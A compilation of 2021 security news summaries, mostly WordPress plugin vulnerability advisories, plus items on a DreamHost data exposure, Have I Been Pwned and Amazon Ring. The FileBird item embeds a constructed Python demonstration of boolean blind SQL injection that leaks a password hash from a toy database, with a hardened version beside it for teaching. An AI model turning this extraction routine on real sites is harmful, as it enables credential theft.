Security Vulnerability Discovered in FileBird Plugin; Update Available

On June 9, 2021, a 10up engineer conducted a routine code review of the FileBird plugin on behalf of a client. The review followed 10up’s Engineering Best Practices and focused on areas that did not pass our initial automated scans. It uncovered that the code was vulnerable to a blind SQL injection attack, a variant of SQL injection in which the query results are never displayed to the attacker, so the attacker instead sends the database a series of “yes or no” questions and infers the answers from the application’s behaviour, extracting data one bit at a time.
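As an added illustration of the blind SQL injection class described above (a constructed example, not FileBird’s code and not part of the 10up review), the following Python script builds an in-memory SQLite database standing in for WordPress/MySQL, exposes a folder lookup whose only observable result is whether a row exists, and shows how that single yes/no bit is turned into a character-by-character read of another table. The hardened version of the same lookup, using a type check and a bound parameter, sits beside it. The table and column names, the placeholder hash, and the lookup functions are all hypothetical; SQLite’s `substr()`/`unicode()` play the role of MySQL’s `SUBSTRING()`/`ASCII()`.

```python
"""Boolean-based blind SQL injection, illustrated on a constructed SQLite
schema (stand-in for WordPress/MySQL). Hypothetical code, not FileBird's."""
import sqlite3

# Constructed sample data; the hash is a placeholder, not a real credential.
SECRET_HASH = "$P$BplaceholderHashForDemo"


def make_db():
    """In-memory database with a 'folders' table the app queries and a
    'users' table the attacker wants to read."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE folders (id INTEGER PRIMARY KEY, name TEXT)")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                "user_login TEXT, user_pass TEXT)")
    con.executemany("INSERT INTO folders (name) VALUES (?)",
                    [("Images",), ("Documents",)])
    con.execute("INSERT INTO users (user_login, user_pass) VALUES (?, ?)",
                ("admin", SECRET_HASH))
    con.commit()
    return con


def folder_exists_vulnerable(con, folder_id):
    """Vulnerable pattern: the request parameter is interpolated into SQL.
    Nothing from the query is echoed back; the caller only learns whether a
    row matched. That single bit is the 'yes or no' oracle."""
    sql = f"SELECT id FROM folders WHERE id = {folder_id}"
    return con.execute(sql).fetchone() is not None


def folder_exists_hardened(con, folder_id):
    """Fixed pattern: validate the type, then bind the value as a parameter
    (the WordPress equivalent is absint() plus $wpdb->prepare('%d'))."""
    if not str(folder_id).isdecimal():
        return False
    row = con.execute("SELECT id FROM folders WHERE id = ?",
                      (int(folder_id),)).fetchone()
    return row is not None


def extract_via_oracle(oracle, column, table, row_filter, max_len=64):
    """Recover a string using only yes/no answers. For each position a binary
    search over the ASCII range asks 'is this character's code > mid?', so
    every character costs seven queries. Returns (recovered, query_count)."""
    recovered, queries = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite: substr()/unicode(); MySQL: SUBSTRING()/ASCII().
            payload = (f"1 AND (SELECT unicode(substr({column}, {pos}, 1)) "
                       f"FROM {table} WHERE {row_filter}) > {mid}")
            queries += 1
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # Past the end: substr() yields '' and unicode('') is NULL,
            # so every comparison is false and the search settles on 0.
            break
        recovered += chr(lo)
    return recovered, queries


def demo():
    """Leak the admin password hash through the boolean oracle."""
    con = make_db()
    oracle = lambda payload: folder_exists_vulnerable(con, payload)
    return extract_via_oracle(oracle, "user_pass", "users",
                              "user_login = 'admin'")


if __name__ == "__main__":
    leaked, n = demo()
    print(f"recovered {leaked!r} with {n} yes/no queries")
```

The point of the binary search is cost: each character of the target needs only seven requests, so a 26-character value leaks in under 200 calls to an endpoint that never returns a single byte of query output. The hardened lookup closes the hole not by filtering characters but by never letting the parameter be parsed as SQL at all.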

That same day, our team responsibly disclosed the vulnerability. We reached out to the team at WPScan, who we’ve previously collaborated with on our WP-CLI Vulnerability Scanner and WordPress Composer Scanner, to report the vulnerability and collaborate on disclosure.

The FileBird plugin authors responded quickly and responsibly, and issued a patch within 36 hours.

This is a critical vulnerability that only impacts version 4.7.3 of the FileBird plugin. It does not impact any previous versions and has been patched in version 4.7.4. All users of FileBird version 4.7.3 are advised to upgrade immediately.

Source and more details: https://10up.com/blog/2021/security-vulnerability-filebird-wordpress-plugin/

‘Have I Been Pwned’ Code Base Now Open Source

Founder Troy Hunt also announces the platform will receive compromised passwords the FBI finds in its investigations.

Have I Been Pwned (HIBP), the free website used by millions to check whether their credentials have been compromised, has open sourced its code base, founder Troy Hunt announced today.

Hunt first mentioned plans to open source the HIBP code base last summer. Now, as requests for the website’s Pwned Passwords approach 1 billion per month, he has confirmed it is officially open source via the .NET Foundation, an independent 501(c) nonprofit organization.

Hunt also announced today that HIBP will receive compromised passwords discovered as part of FBI investigations. The website will provide officials with a way to feed the passwords into HIBP and surface them via the Pwned Passwords tool, he explained.

Source: https://beta.darkreading.com/threat-intelligence/-have-i-been-pwned-code-base-now-open-source

One of the Biggest Website Hosting Providers, DreamHost, Leaked 814 Million Records Online Including Customer Data

A database belonging to DreamPress, DreamHost’s managed WordPress hosting service, was publicly accessible online.

3 Years of DreamPress Customer and User Data Exposed Online

On April 16, 2021, security researcher Jeremiah Fowler, together with the Website Planet research team, discovered a database with no password protection that contained just under one billion records. The exposed records revealed usernames, display names, and email addresses for WordPress accounts. The monitoring and file logs exposed many internal records that should not have been publicly accessible. They were structured as roles, ID, display name, email, and other account-related information.

Upon further research there were multiple references to DreamHost. The well-known hosting provider, which serves over 1.5 million websites, also offers a simple way to install the popular blogging platform WordPress, called DreamPress. According to their website, DreamPress is DreamHost’s managed WordPress hosting: a scalable service that allows users to manage their WordPress sites.

Among the data exposed:

  • Total Size: 86.15 GB / Total Records: 814,709,344
  • The records exposed: Admin and user information for what appears to be DreamPress accounts for WordPress installations. These include WordPress login location URL, first and last names, email addresses, usernames, roles (admin, editor, registered user, etc).
  • Email addresses of internal and external users that could be targeted in phishing attacks or other social engineering scams.
  • The database was at risk of a ransomware attack due to the configuration settings that allowed public access.
  • Also exposed: host IP addresses and timestamps, and build and version information that could provide a secondary path for malware. Plugin and theme details, including configuration or security information, could potentially allow cyber criminals to exploit the installation or gain access deeper into the network.

Source: https://www.websiteplanet.com/blog/dreampress-leak-report/

Amazon’s Ring is the largest civilian surveillance network the US has ever seen

Ring is effectively building the largest corporate-owned, civilian-installed surveillance network that the US has ever seen. An estimated 400,000 Ring devices were sold in December 2019 alone, and that was before the across-the-board boom in online retail sales during the pandemic. Amazon is cagey about how many Ring cameras are active at any one point in time, but estimates drawn from Amazon’s sales data place yearly sales in the hundreds of millions. The always-on video surveillance network extends even further when you consider the millions of users on Ring’s affiliated crime reporting app, Neighbors, which allows people to upload content from Ring and non-Ring devices.

Then there’s this: since Amazon bought Ring in 2018, it has brokered more than 1,800 partnerships with local law enforcement agencies, who can request recorded video content from Ring users without a warrant. That is, in as little as three years, Ring connected around one in 10 police departments across the US with the ability to access recorded content from millions of privately owned home security cameras. These partnerships are growing at an alarming rate.

Because Ring cameras are owned by civilians, law enforcement are given a backdoor entry into private video recordings of people in residential and public space that would otherwise be protected under the Fourth Amendment. By partnering with Amazon, law enforcement circumvents these constitutional and statutory protections, as noted by the attorney Yesenia Flores. In doing so, Ring blurs the line between police work and civilian surveillance and turns your neighbor’s home security system into an informant. Except, unlike an informant, it’s always watching.

Full article: https://www.theguardian.com/commentisfree/2021/may/18/amazon-ring-largest-civilian-surveillance-network-us

Easily Exploitable Critical Vulnerabilities Patched in ProfilePress Plugin

The Wordfence Threat Intelligence team initiated the responsible disclosure process for several vulnerabilities that were discovered in ProfilePress, formerly WP User Avatar, a WordPress plugin installed on over 400,000 sites. These flaws made it possible for an attacker to upload arbitrary files to a vulnerable site and register as an administrator on sites even if user registration was disabled, all without requiring any prior authentication.

A patch was quickly released on May 30, 2021 as version 3.1.4.

Source: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin

Cross-Site Request Forgery Patched in WP Fluent Forms

The Wordfence Threat Intelligence team responsibly disclosed a Cross-Site Request Forgery (CSRF) vulnerability in WP Fluent Forms, a WordPress plugin installed on over 80,000 sites. The same flaw also allowed a stored Cross-Site Scripting (XSS) attack which, if successfully exploited, could be used to take over a site.

A patched version of the plugin, 3.6.67, was released on March 5, 2021.

Source: https://www.wordfence.com/blog/2021/06/cross-site-request-forgery-patched-in-wp-fluent-forms

High Severity Vulnerability Patched in WooCommerce Stock Manager Plugin

The Wordfence Threat Intelligence team discovered and reported a vulnerability in WooCommerce Stock Manager, a WordPress plugin installed on over 30,000 sites. This flaw made it possible for an attacker to upload arbitrary files to a vulnerable site and achieve remote code execution, as long as they could trick a site’s administrator into performing an action like clicking on a link.

A patch was quickly released on May 28, 2021 in version 2.6.0.

Source: https://www.wordfence.com/blog/2021/06/high-severity-vulnerability-patched-in-woocommerce-stock-manager-plugin

Malicious Attack Campaign Targeting Jetpack Users Reusing Passwords

The Wordfence Threat Intelligence and Site Cleaning teams have been tracking a malware campaign that redirects all site visitors to malvertising domains, while attempting to keep site administrators unaware of the infection. Since June 1, 2021, the number of sites we are tracking that have been infected with this malware has more than doubled, and we expect this campaign to continue gaining momentum as it relies on a mechanism that is difficult to block directly.

Jetpack is one of the most popular plugins in the WordPress repository, and it has a dizzying array of features that require users to connect their sites to a WordPress.com account. One of these features allows users that are logged in to WordPress.com to perform administrative tasks, including plugin installation, on sites that are connected to WordPress.com via Jetpack.

Unfortunately, this means that if the credentials for a WordPress.com account are compromised, an attacker can log in to that WordPress.com account and install arbitrary plugins on the connected WordPress site no matter where it is hosted. This includes the malicious plugin used in this campaign. We’ve written about this intrusion vector in the past, and it is regaining popularity due to a number of recent data breaches at other services.

To clarify, no data breach has occurred at WordPress.com itself. However, password reuse is incredibly common, and credentials obtained from recent data breaches are likely to grant access to a number of WordPress.com user accounts. Additionally, although it is possible to configure Jetpack to allow direct login to a site via WordPress.com credentials, this setting does not need to be enabled in order for a site to be vulnerable. All that is required is that a site be connected to a WordPress.com account that has compromised credentials.

What should I do?

If you use Jetpack, you should turn on two-factor authentication at WordPress.com. While we strongly recommend using a mobile app or security key for this, even SMS-based two-factor authentication is significantly more secure than relying on passwords alone.

If you use the same password for your WordPress.com account that you’ve used for any other service, change your WordPress.com password immediately.

Source: https://www.wordfence.com/blog/2021/06/malicious-attack-campaign-targeting-jetpack-users-reusing-passwords

Critical 0-day in Fancy Product Designer Under Active Attack

A patched version of Fancy Product Designer, 4.6.9, is now available as of June 2, 2021. This article has been updated to reflect newly available information, including Indicators of Compromise.

On May 31, 2021, the Wordfence Threat Intelligence team discovered a critical file upload vulnerability being actively exploited in Fancy Product Designer, a WordPress plugin installed on over 17,000 sites.

We initiated contact with the plugin’s developer the same day and received a response within 24 hours. We sent over the full disclosure the same day we received a response, on June 1, 2021. Due to this vulnerability being actively attacked, we are publicly disclosing with minimal details until users have time to update to the patched version in order to alert the community to take precautions to keep their sites protected.

While the Wordfence Firewall’s built-in file upload protection sufficiently blocks the majority of attacks against this vulnerability, we determined that a bypass was possible in some configurations. As such, we released a new firewall rule to our premium customers on May 31, 2021. Sites still running the free version of Wordfence will receive the rule after 30 days, on June 30, 2021.

As this is a Critical 0-day under active attack and is exploitable in some configurations even if the plugin has been deactivated, we urge anyone using this plugin to update to the latest version available, 4.6.9, immediately.

Source: https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack

Severe Vulnerabilities Patched in Simple 301 Redirects by BetterLinks Plugin

The Wordfence Threat Intelligence team reported several vulnerabilities they had discovered in Simple 301 Redirects by BetterLinks, a WordPress plugin installed on over 300,000 sites. One of these flaws made it possible for unauthenticated users to update the site’s redirects, allowing an attacker to send all site traffic to an external malicious site. In addition, several remaining flaws made it possible for authenticated users to perform actions such as installing and activating plugins, along with less critical actions.

An initial patch was released on April 15, 2021, and a fully patched version of the plugin was released on May 5, 2021 as version 2.0.4.

Source: https://www.wordfence.com/blog/2021/05/severe-vulnerabilities-patched-in-simple-301-redirects-by-betterlinks-plugin/